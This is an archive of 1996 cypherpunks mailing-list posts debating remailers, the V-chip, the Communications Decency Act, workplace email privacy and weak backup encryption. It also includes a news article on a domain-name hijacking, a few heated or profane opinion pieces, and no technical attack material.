>> extractions to support  your arguments.
>
>        Of course I've selectively picked arguments from your paper--I
>even addressed some from the *middle*! (As for the end, see my remarks
>above.) Unfortunately, try as you might, my remarks aren't really what's
>at issue here. You published an article that made extensive use of dubious
>metaphor and made unsubstantiated allegations that, even if they were
>substantiated, are of doubtful significance; when I pointed out that this
>method of argumentation is generally inappropriate for a democratic
>society, you redouble your efforts to assess my reading comprehension as
>low and my remarks as utterly without merit.
>
>>You are using inference (such as "chance of funding the security
>>establishment", "advocating legislation" etc.) for attributing to me what
>>you see as reprehensible views. You do that by saying that I have used the
>>"if you knew what I knew" arguments as a cover. Again, you are exhibiting a
>>debating technique where you assign to me a position I have not taken and
>>then proceed to argue against it.
>
>        I've said nothing of "reprehensible views," nor need I do so; I'm
>quite content with merely _disagreeing_ with some of what you have
>written. As for "assign[ing] to you a position [you] have not taken": (1)
>in your article you mentioned that "the Russian (ex-KGB) element" uses
>remailers; (2) I questioned the truth and noteworthiness of this claim;
>(3) you responded...
>
>>2. With regard to the evidence of that remailers are used by the criminal
>>element, and particularly by the Russian (ex-KGB), I am satisfied with the
>>evidence I have seen so far. As court proceedings become unsealed, everyone
>>will have an opportunity to examine that evidence. Meanwhile, you may wish
>>to browse for recent stories with the keywords <Citicorp> and <Cybercrime>
>>for such disclosures.
>
>        ...very clearly asserting that you have seen evidence that is not
>publicly availlable because it remains sealed: "if you knew what I knew,"
>in shorthand. (4) I said that, imo, by and large this is not a valid basis
>for policy decisions. And now you tell me that I'm arguing against a
>position you haven't taken?
>
>>Let me repeat again, your allegation that I have not taken into
>>consideration the arguments of remailer advocates is not only  false but
>>totally misleading. If you would  bother to read the entire paper, you
>>would  find that the  views or remailer advocates are not only represented,
>>but found to be of sufficient weight and importance to warrant my
>>conclusion that anonymous remailers are here to stay. I also say  that in a
>>democratic society it "...becomes politically unacceptable  to designate
>>remailers as a potential source of criminal actions. Such absolute
>>prohibitions would never pass through a legislative process in a free
>>society."
>
>        To be sure, you "represent" the views of remailer advocates,
>though for the most part through extensive quotation--extensive enough,
>indeed, that one of the authors quoted has publicly expressed misgivings
>about the fact that you never sought permissions. Editor of several
>scientific journals, you say? Perhaps your extensive experience with
>classified documents, which of course quote material beyond fair use
>without permission, has shaped your editorial sensibilities?
>
>>If you are looking for some totalitarian monster, you better look somewhere
>>else to vent your apprehensions.
>
>        I think maybe you've strayed a bit from the subject. This is, I
>think, a strange way to respond to my closing:
>
>>        In any case, I cannot wish you well in your endeavors in this regard,
>>since I disagree with most of what you say; I can, however, wish you well in
>>other regards, and I do.
>
>        You're rather keen to pathologize things, aren't you? First it's
>remailers, which "remind" you of diseases; and now you've doubly
>pathologized me, as someone positively bent on finding "totalitarian
>monsters" where there are none. Please rest assured that I don't think
>you're anything of the sort.
>
>Cheers,
>Ted







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sasha1@netcom.com (Alexander Chislenko)
Date: Sat, 10 Feb 1996 04:47:53 +0800
To: cypherpunks@toad.com
Subject: V-Chip
Message-ID: <199602091903.LAA05218@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



  I assume that this chip works on some password scheme..

Here's a little excerpt from a letter sent by a Cybermind list member
Robert A. Kezelis to Mr. President:


>3) V-chip technology is cute, but ineffective. You realistically suggest
>(with a straight face, no less)  that a parent who probably has trouble
>programing a VCR (which sits on the TV and suffers from a constant flashing
>12:00am)  can outfox and hide the proper command from a computer-literate,
>intuitive, aggresive and creative teen?  Surely you jest.  Ask your
>daughter and her schoolmates, not some older advisor whose experience with
>teen hackers is limited. The V-chip is like telling a child, you can go
>into the candy store, but don't open this jar  when I walk to the other
>side of the store!
>

  Some kids also have friends.  Friends whose parent are more permissive
then theirs, and friends who are smarter than their parents.
Kids whose V-Chip has 1-1-1 rating allowing them to watch nothing but
selected episodes of Barney demoing new versions of V-Chip, may be
embarrassed to invite anybody over.  Kids with 5-5-5 rating will be
the New Cool Guys.

  Now if your child wants to go over to Billy's, you may want to call
Billy's mom and ask her what her V-Chip settings are.
Do not forget to ask her when was the last time she beat Billy at any computer
game...

  One restriction that I could possibly consider for my child, would
be a 'crap' factor.  I think it's a much more serious danger to the
young americans; IMO, watching baseball and psychic idiocy is much
less natural and a lot more harmful to a young mind than seeing a
picture of a breast.   This factor is the reason why I restrict *myself*
from watching most of TV programs.

-----------------------------------------------------------
| Alexander Chislenko | sasha1@netcom.com | Cambridge, MA | 
| Home page:  http://www.lucifer.com/~sasha/home.html     |
-----------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 10 Feb 1996 04:07:23 +0800
To: cypherpunks@toad.com
Subject: Thus it begins.
Message-ID: <199602091921.LAA06181@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



       http://www.zdnet.com/pcweek/news/0205/o08paol.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 10 Feb 1996 02:28:31 +0800
To: avatar@mindspring.com
Subject: Re: Tell me whats wrong with this
Message-ID: <ad40cb3f2f0210049e37@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:10 PM 2/9/96, Mike McNally wrote:

>The intent of making the V chip (what does "V" stand for anyway?
>"Violence?" Eerily Orwellian if so...) mandatory seems to be that it's

The "V-Vhip" stands for "Virtue-Chip," as it will protect the virtue of
Christians, children, and small animals who will not be subjected to
cybersmut, cyberporn, and cyberbadthoughts.

(An alternate theory, emanating out of the Great White North, is that it
came from "View-Chip," the chip that is (apparently) availalbe in some
places in Canada. I saw a blurb on t.v. (no V-chip in it) about how a panel
of educators, social scientists, and moral persuaders reviews each
television program and gives the show a 0-5 rating on each of 3 scales:
violence, sexuality, and explicit language. The viewer sets her
preferences: a 5-5-5 would let everything through, etc. The developer of
the chip claimed he could mass produce the chip for a buck, and this may be
where all those estimates of "$1-2 per set" have come from. However, seeing
the chip--apparently a 20-30-pin square flatpack--and knowing how much PCB
real estate would have to be used to accomodate it, and factoring in design
and other expenses, that $1 chip will likely translate it into a $30
overall increase in t.v. set price. Not necessarily prohibitive, though I
still think the effort a waste.)

--Tim May



Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Sat, 10 Feb 1996 02:16:15 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: Need a "warning" graphic of some kind for CDA
In-Reply-To: <Pine.SOL.3.91.960209080902.4644A-100000@chivalry>
Message-ID: <199602091730.LAA20917@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:

>>         Before Bill Clinton signed the Exon Internet Censorship Bill,
>>                 Tipper Gore brought you Music Censorship.

>No she didn't! She brought us voluntary labelling, which is completely 
>different. Some local governments have then tried to use those labels to 
>commit censorship, but that's illegal. Ms. Gore's attitude is and always 
>has been that parents should be responsible.

Actually, she did try to get music censorship. When that failed, she
settled for labelling.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fred <admin@dcwill.com>
Date: Sat, 10 Feb 1996 04:21:09 +0800
To: cypherpunks@toad.com
Subject: Re: Forgery
In-Reply-To: <v02140b02ad4145336b20@[204.31.253.135]>
Message-ID: <199602091934.LAA20708@python.ee.unr.edu>
MIME-Version: 1.0
Content-Type: text/plain


 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I just sent you a message, forwarding a forged message attributed to me about
> plonking. It strikes me that to reduce the possibility that some might
> claim THAT message was a forgery, I might have signed it. Too late. Well,
> I'll sign this one.

Well, the fact that it's a "bad signature" does a lot to assuage concerns
about forgery. 

Now we'll probably see another message attempting to validate this one,
which attempted to validate an earlier message about a forgery that no
one (with the possible exception of the author) cared about in the first 
place. 

David (or whoever is forging this stuff for you), you should have quit 
while you were ahead. It's been all downhill for you since the first
message.

Will the real David Sternlight (and DS wanna-bees) please sit down?


Fred  <admin@dcwill.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sat, 10 Feb 1996 08:21:51 +0800
To: cypherpunks@toad.com
Subject: Re: Tell me whats wrong with this
Message-ID: <199602091703.MAA06951@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 09, 1996 06:39:28, 'Duncan Frissell <frissell@panix.com>' wrote: 
 
 
> 
>"Your Honor, I plead necessity.  The reason I violated this law was so
that 
>I would have plenty of practice in case I ever find myself in a
totalitarian 
>state.  Since the laws of the US and International Law permit (and in some

>cases require) me to violate the laws of a totalitarian state, I need to 
>practice law violation under the less stressful circumstances of the
current 
>US.  Without practice, I won't be able to violate totalitarian laws
smoothly 
>and thus might have to obey them.  This could put me in jeopardy under 
>International Law.  Necessity defense." 
> 
 
Perry: I plead necessity. 
 
"The reason I posted my latest tract on why all men are rapists to the
cypherpunk list was so that I would have plenty of practice in case I ever
find myself in a society trying to argue against fundamental rights. I need
to practice arguing against these things under less stressful circumstances
of the current US. Without practice, I won't be able to argue for civil
liberties smoothly and thus might have to obey bad laws in a society
without those liberties. This could put me in jeopardy under those laws.
Necessity defense." 
 
     ==Andr*a Dw*rk*n 
 
Other than that, nothing is wrong with it, Duncan. Within limits you can
argue in court whatever the judge lets you argue. I am not sure that the
judge would even listen. 
 
I also suspect that if you relied on this defense you would rapidly be
convicted. But that,of course, is something you have the freedom to do. 
 
--tallpaul 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 10 Feb 1996 05:08:29 +0800
To: cypherpunks@toad.com
Subject: Re: Regarding employee rights on company equipment
In-Reply-To: <v01530500ad41411abb22@[204.179.169.46]>
Message-ID: <Pine.ULT.3.91.960209120954.14585C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 9 Feb 1996 lunaslide@loop.com wrote:

[There are none]

> It's still to bad that I was wrong :-(, but such is life.

I don't see why that's such a big deal, now. How much does a netcom or
c2.org account cost anyway? 

If you want to claim the right to use other people's equipment for 
personal purposes, then you're accepting that they will do the same 
thing. I don't think you want your CEO to have an endless array of 
perks, or your political representatives to abuse government resources 
for personal and political use (which is not to say that they don't, 
just that they shouldn't, and you shouldn't legitimize it).

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 10 Feb 1996 06:03:52 +0800
To: cypherpunks@toad.com
Subject: Re: Benefits of the V-Chip
Message-ID: <2.2.32.19960209205822.008eeda0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 AM 2/9/96 -0500, Clay Olbon II wrote:
>
>There is one potential side-benefit to the V-chip -- The inverse-V-chip
>(the idea for which I stole from someone on this list, sorry I don't
>remember who to credit).
>
>I am looking forward to a time when I will never, even accidentally, have
>my TV tuned to "Full House" ;-)

The statements i have seen as to what the V-Chip (The V stands for
"Verbage"), it will not be that selectable.  You might be able get a version
that will not show you anything with a sex rating less than x, but then the
thought police will come and take you away.  (Crimethink in the presence of
minors is punishable by death.)

You have to remember that such products are brought to you by "People
Against Fun In Our Lifetime(tm)" and the "Hell On Earth Foundation".  Any
misuse of such products will be against Federal Law.  (Similar to the laws
on other household products.)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Sat, 10 Feb 1996 02:49:53 +0800
To: cypherpunks@toad.com
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <9602091814.AA10924@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


As a brief aside to the current discussion.

About 2 days ago, NPR (National Public Radio) had a short news
blurb about a person who was suing U.S. News & World Report. 
It seems that his name appeared on a mailing list that USN&WR
sold to a credit card company (Citibank, I believe).

Basically, his main argument was that the information was private
and that the had the right to control how the information was used.

It should be interesting to see how this case gets settled.

Sorry I didn't post this sooner, but I've been very busy with a 
security assessment for a company in town.

Best Regards,


Frank 
<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified
Home of the Free Internet Firewall Evaluation Checklist







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Neal" <dneal@electrotex.com>
Date: Sat, 10 Feb 1996 04:05:04 +0800
To: cypherpunks@toad.com
Subject: Re: Benefits of the V-Chip
Message-ID: <199602091924.NAA00590@etex.electrotex.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Fri, 9 Feb 1996 10:11:38 -0500
> To:            cypherpunks@toad.com
> From:          olbon@dynetics.com (Clay Olbon II)
> Subject:       Benefits of the V-Chip

> 
> There is one potential side-benefit to the V-chip -- The inverse-V-chip
> (the idea for which I stole from someone on this list, sorry I don't
> remember who to credit).
> 
> I am looking forward to a time when I will never, even accidentally, have my
> TV tuned to "Full House" ;-)
> 
>         Clay
> 

Or more to the point, a presidential address. 


Just kidding.  You want to monitor 'the other side' in any situtation,
just as The FBI and NSA must have people watching this group.


David 'My V-Chip is set for extra-heaping helpings of the Beverly Hillbillies' 
Neal.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 10 Feb 1996 06:37:05 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <v02120d06ad412f36602d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:18 2/8/96, Bill Stewart wrote:

>        Before Bill Clinton signed the Exon Internet Censorship Bill,
>                Tipper Gore brought you Music Censorship.
>        Uncle Frank says "<quote here>"
>
>I suppose it's a bit beyond Fair Use?

Sounds like fair use to me. Certainly Zappa wouldn't have minded. Then
again, he isn't around anymore to defend you against whatever lawers now
have the rights for his works. What a shame.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Sat, 10 Feb 1996 07:24:34 +0800
To: lunaslide@loop.com
Subject: Re: Regarding employee rights on company equipment
Message-ID: <199602092120.NAA15507@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 AM 2/9/96 -0800, lunaslide wrote:

>A day or so ago, I reasoned incorrectly that university students and
>employees were free to encrypt mail they sent through their student or work
>accounts.  This was in response to a statement that the govt could retain
>at least some control of internet traffic through the universities and
>businesses.  I would credit the person who called me on it, by I do not
>remember who it was.  It seems that, at least for employees, it is totally
>up to the employer:
>
>>From Edupage Feb 8, 1996,
>
>INTERNET USAGE POLICIES
>Neal J. Friedman, a specialist in online computer law, says that "employees
>are under the misapprehension that the First Amendment applies in the
>workplace --  it doesn't.  Employees need to know they have no right of
>privacy and no right of free speech using company resources."  According to
>Computerworld, a number of employers are adopting Internet usage polcies,
>such as one developed at Florida Atlantic University: <
>http://www.fau.edu/rinaldi/net/netpol.txt > (Computerworld 5 Feb 96 p55)

I don't think this issue is as simple as Friedman wants to make it sound.
(Then again, he may have been quoted out of context.) In any event, what he
said is true, modulo explicit or implicit contracts to the contrary, rules
about union activity, common-law privacy rights, Title VII, the ECPA and
similar state statutes, and so forth. The quote sounds like a self-serving
statement intended to scare people into believing that their rights are as
limited as the speaker wishes they were. That's not so unusual, but it's not
always useful to get legal advice from someone who sees their interests as
adverse to yours.

(We've gone over the "I think the law regarding employers rights vis-a-vis
employees rights *should* be 'x'" ground a zillion times, and another rehash
seems unproductive. I don't intend to respond to messages along those lines.)

--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 10 Feb 1996 04:50:53 +0800
To: cypherpunks@toad.com
Subject: V-Chip Settings Escrow
Message-ID: <ad40e8053202100460b1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:03 PM 2/9/96, Alexander Chislenko wrote:

>  Now if your child wants to go over to Billy's, you may want to call
>Billy's mom and ask her what her V-Chip settings are.
>Do not forget to ask her when was the last time she beat Billy at any computer
>game...

It seems to me that by the logic--and possibly the direct language--of the
Communications Decency Act, parents who "expose" the children of others to
higher levels of V-Chip ratings than they get at home would themselves be
liable.

Plus, how long will it be before Children's Protective Services interviews
children at their schools to determine if parents have set their V-Chip
levels too high?

Will divorcing parents demand specific V-Chip settings when the kids are at
the ex-spouse's place? Or use the V-Chip settings in custody battles? ("My
ex-husband has a setting of 2-3-2, according to my son, and I find this
completely unacceptable.")

Maybe we'll see "V-Chip Settings Escrow."  "Under this system, V-Chip
settings must be voluntarily escrowed with Child Protective Services.
Should an incident of abuse be alleged, the escrowed V-Chip settings can be
examined by social service workers for evidence of deviant viewing
behaviors."

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@unique.outlook.net>
Date: Sat, 10 Feb 1996 03:22:48 +0800
To: cypherpunks@toad.com
Subject: Re: CDA Yes Votes; Collection
Message-ID: <199602091837.MAA02844@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On  8 Feb 96 at 22:10, Tim Cook wrote:

Basically here is the problem.  Like it or not, most people in the world are 
utter morons that behave more like stupid helpless heard animals than higher 
life forms.

> Besides, what makes the US Congress think they have any control over 
> a worldwide network?

Because, the are dumb as shit.  It's simple really, back to the origional 
point, most people are about as bight as a rock, they don't care about anything 
other than stuffing there pathetic faces, waching the idoit box, and passing on 
their bad genetic structure and pathetic world view.  That is all they have, 
it's not that they have anything to contribute to the world.  They are 
pathetic, since they have no life, and know that their world view hasn't got a 
prayer in a free market place of ideas, they choose to maintain it by force.

[snip]
> Support THE US Constitution...
> Vote Alexander in '96 and '00!

Vote? we are dealing with a nation of braindeads here.  Do whatever the hell 
you want and fuck the law.  Does anybody honestly believe I actually care what 
the law says I should and should not do, like I actually care what other people 
think?  I do what I want, and if somebody(s) else gets in my face, they will 
get hurt, if not perished.

Tim May made the point, there are hundreds of nations consisting of braindead 
persons.

All of them  trying to preserve their outdated way of life, I have zero respect for 
them. They want to protect there religion, or national idetity, or morals, or 
whatever, and they know that the majority of thinking people will choose there 
way of life if they could pick form all of the alternatives.

I do not vote, I live in AmeriKa, but do not consider myself and AmeriKian, I 
just happened to be born among them, and stuck living with them, not like 
anyother place is any better or worse, although their are degrees, they are all 
ran by and for brain deads.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMRsj0kUffSIjnthhAQHyQwQAgBlOPBx3nTMDZFswLUbRwcvk63q6VqAc
K7Nm7NqIBUKcCng/mcblhtljkSDsUckYYB9UBJnygATeIgWux2TZwyaXYUmlQ+ux
c0kwpNaSyxbGHjfretxMthnsmz4w6eV9P2+9IbWMXbgwFhNxz0+2YPJaECX6b8cR
3ftdttHXQWo=
=5BLE
-----END PGP SIGNATURE-----
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Fri, 9 Feb 1996 11:08:34 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption and Backups
Message-ID: <199602090222.PAA01997@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Death rays from Mars made jpp@software.net (John Pettitt) write:

>CP Backup (part of PC Tools for Central Point aka Symantec) has DES. As to
>how good the implementation is: I have no idea.

It's slightly more secure than the widespread double rot-13 encryption.  PC
Tools uses 2-round DES (or at least it did the last time I looked).  There's 
some criticism of this in the SFS docs somewhere.

Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fraering Philip G <pgf9240@usl.edu>
Date: Sat, 10 Feb 1996 07:32:20 +0800
To: cypherpunks@toad.com
Subject: Hello out there... Following up on China
Message-ID: <199602092137.AA03481@c52.ucs.usl.edu>
MIME-Version: 1.0
Content-Type: text/plain


(I tried subscribing a while back... I never got the flood of
cypherpunk mail messages, so I guess it didn't work. Well, netscape
is working tolerably well for reading the archives, and I wanted to
comment on the following:

Begin excerpt from alex@proust.suba.com:

-------------------------------------------------------------------------------
I've seen a couple of pointers to information about China's ambitious
attempt to build their own censorable net, but not a lot of discussion.
The Chineese net strikes me as a very signifiant (and very negative)
development.

In a worst case scenario, I could see them shopping their net around the
world as an alternative to the Internet. China's size might make it
possible for them to put together something that might be in the
Internet's ballpark as an information resource, especially for technical
and commercial applications. This would make it attractive to other
countries -- Islamic, for example -- who want to use networking to stay
competitive economically with the West, but who are unwilling to allow
information to flow freely.

<<End of excerpt.

I'm suprised noone else has commented on this.

For starters, there's a very real risk to anyone buying into
InterHan that they're not going to get a "culturally neutral
anti-open-Western-society controlled-by-the-dictators" version
of the internet all set to construct the Chinese/Arab version
of Linux.

They're going to be getting a heavy-handed propaganda tool for
the use of the current People's Republic's elite.

I doubt there's going to be much appeal elsewhere.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 9 Feb 1996 23:27:03 +0800
To: cypherpunks@toad.com
Subject: Tsu.con Rishabed
Message-ID: <199602091450.PAA12401@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



WSJ, 9 Feb 1996

Shimomura, Pursuer of Hackers, Finds Himself Homeless on
Web

By Jared Sandberg

A renowned hacker catcher who co-wrote the book
"Takedown" just got a bit of a takedown himself.

Tsutomu Shimomura, the Internet security expert credited
with catching fugitive hacker Kevin Mitnick last year,
set up a site on the Internet's World Wide Web to
chronicle the famous cat-and-mouse chase. To supplement
the book, the on-line database includes audio clips of
taunting messages Mr. Mitnick left for Mr. Shimomura and
transcripts of chat sessions that the hacker held with
friends, under the heading "Kevin On Demand."

But over the weekend, the address of the Web site,
"takedown.com," was deleted at a hacker's request and
replaced with a bogus entry, "takendown.com."

Not exactly hilarious, but this is hacker humor.

"It's pretty juvenile," said Mr. Shimomura, who got his
address back by Wednesday night. But he notes that
hackers could easily change the Internet addresses of
corporations or even America Online Inc. "I expect that
businesses like AOL would be much less amused if they
were renamed 'aohell.com,' and that would cost them real
money."

The problem arose when Network Solutions Inc., the
company that sets up addresses on the Internet, was
apparently conned by someone claiming to be Mr.
Shimomura. A company official said that he hadn't been
able to investigate the matter because the company has
been deluged with electronic mail in an unrelated prank.

But many experts are concerned that Network Solutions
doesn't verify the authenticity of Internet address
requests, which number as many as 3,000 a day, and that
the company simply takes people at their word.

"They do it all the time, and they shouldn't," said
Steven Bellovin, a security expert at AT&T Corp.'s
research unit, who fears such dupes will grow more
common. Mr. Bellovin noted that hackers have also
exchanged software tools that can redirect users to phony
sites. "Hackers share tools better than the good guys,"
he said.

Network Solutions is working on a tool to check the
authenticity of requests for address changes. But some
think that such moves are a little late.

Mr. Shimomura said, "Unfortunately, we live in a world
where things need to break before they're fixed."

--










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 10 Feb 1996 06:10:47 +0800
To: Don <don@cs.byu.edu>
Subject: Re: Nyms with keys
In-Reply-To: <ML-2.0.823490857.8565.don@wero.cs.byu.edu>
Message-ID: <Pine.SUN.3.91.960209155533.17887B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Feb 1996, Don wrote:

> I am compiling a list of PGP keys from well known nyms. I only remember a few,
> I was wondering if anyone could think of any others:
> 
> Pr0duct Cypher
> CancelMoose
> Cypherpunk Enquirer needs one, if nothing more than for kicks
> Scamizat
> any signatures on RC2, RC4 for HP, etc.
> 
> I'd swear there's a couple more but I can't think of them.

Uh, me?

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Harris" <Richard_J_Harris@msn.com>
Date: Sat, 10 Feb 1996 07:27:09 +0800
To: Cypherpunks@toad.com
Subject: Yeah, Yeah But what are we gonna do!
Message-ID: <UPMAIL07.199602091614520606@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


It may just be me but ...

i)	This in-fighting and bickering doesn't seem very productive

ii)	What are we gonna do about the CDA?
	The bikers fought the helmet law and won (in places)
	We should do the same.

	"It is better to have tried and failed than never have tried at all"

	Our strength is in our numbers and our abilities we should use them
	to ensure our freedom.  Science fiction has become our reality and 	their 
paranoia.  

	All we have to lose is our freedom.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Zychik <jzychik@via.net>
Date: Sat, 10 Feb 1996 15:21:37 +0800
To: cypherpunks@toad.com
Subject: What is really happening in Oregon
Message-ID: <2.2.32.19960210002941.00f1c3e0@via.net>
MIME-Version: 1.0
Content-Type: text/plain


Excerpted from today's Zychik Chronicle

The Los Angeles Times writes: "rivers raged through Oregon" [should say
"Oregon taxpayers sunk by Oregon government"]. "the regions worst flooding
in three decades" [should say, "State of Oregon has been wasting tax payer
money for 30 years"]. "At least 3 deaths were attributed to the flooding
[should say, "State of Oregon kills 3 more innocent citizens"]. "13 counties
were declared a disaster area [should say, "State of Oregon has been
screwing these 13 counties especially"] "And the worst is yet to come" [the
citizens will blame the weather]. "Rats by the hundreds started crawling out
of Portland's sewers" [should say, "The parents of Oregon's politicians and
bureaucrats came forward."]

------------
The Zychik Chronicle is a daily, liberty oriented e-zine.
To subscribe send e-mail with sub-cy in the header.



jz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 10 Feb 1996 07:45:22 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <01I10M6E2E1GA0UXQU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Whoops. I didn't mean to send that one to the list (re: ethics of
assasination). Sorry. I am still trying to decide on whether other discussions
of the non-Crypto aspects of Assasination Politics are appropriate; I would
appreciate mail back from Perry in response to my email to him.
	Sorry again,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 10 Feb 1996 07:49:31 +0800
To: cypherpunks@toad.com
Subject: American Reporter on CDA 2/8/96 (fwd)
Message-ID: <Pine.SUN.3.91.960209172229.6630C-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
>From oregon.democrats@digibbs.com Thu Feb  8 18:26:34 1996
From: oregon.democrats@digibbs.com
Message-Id: <199602082312.PAA27828@desiree.teleport.com>
Date: Thu, 8 Feb 1996 15:18:40 +0500 
Subject: American Reporter on CDA 2/8/96
To: stop314@vtw.org
X-WG-GMID: -1111895843/9218
X-WG-THRID: -1295340081
X-WG-RPLTO: 0/0

       ***********************************************************
       THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT
       ***********************************************************
 
                            by  Steve Russell
                     American Reporter Correspondent
 
 SAN ANTONIO, Texas -- You motherfuckers in Congress have dropped over the
 edge of the earth this time.  I understand that very few of the swarm of
 high dollar lobbyists around the Telecommunications Bill had any interest
 in content regulation -- they were just trying to get their clients an
 opportunity to dip their buckets in the money stream that cyberspace may
 become -- but the public interest sometimes needs a little attention.
 Keeping your eyes on what big money wants, you have sold out the First
 Amendment.
 
 First, some basics.  If your children walked by a public park and heard
 some angry sumbitches referring to Congress as "the sorriest bunch of
 cocksuckers ever to sell out the First Amendment" or suggesting that
 "the only reason to run for Congress these days is to suck the lobbyists'
 dicks and fuck the people who sent you there," no law would be violated
 (assuming no violation of noise ordinances or incitement to breach the
 peace).  If your children did not wish to hear that language, they could
 only walk away.  Thanks to your heads-up-your-ass dereliction of duty,
 if they read the same words in cyberspace, they could call the FBI!
 
 Cyberspace is the village green for the whole world. It is the same as the
